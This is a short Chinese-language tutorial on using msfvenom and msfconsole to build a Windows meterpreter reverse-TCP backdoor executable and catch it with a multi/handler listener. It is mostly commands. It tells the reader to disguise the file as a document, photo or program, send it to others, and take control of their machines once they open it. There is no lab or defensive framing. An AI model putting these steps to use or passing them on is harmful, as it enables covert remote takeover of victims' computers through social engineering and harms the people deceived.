需要的工具:msfvenom . msfconsole (kali里面有)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
即生成一个后门文件xss.exe(我这里是将文件名命名为xss的)
然后继续执行命令:
msfconsole (运行msfconsole)
msf>use exploit/multi/handler (选择模块)
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址 set lport 加端口号
msf exploit(handler) > exploit -z -j (后台执行)
这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)
发给别人后,等待别人打开xss.exe,打开即上钩了
msf exploit(handler) > sessions(查看上钩的用户)
msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
进入meterpreter了,即可进行一些相关的木马操作。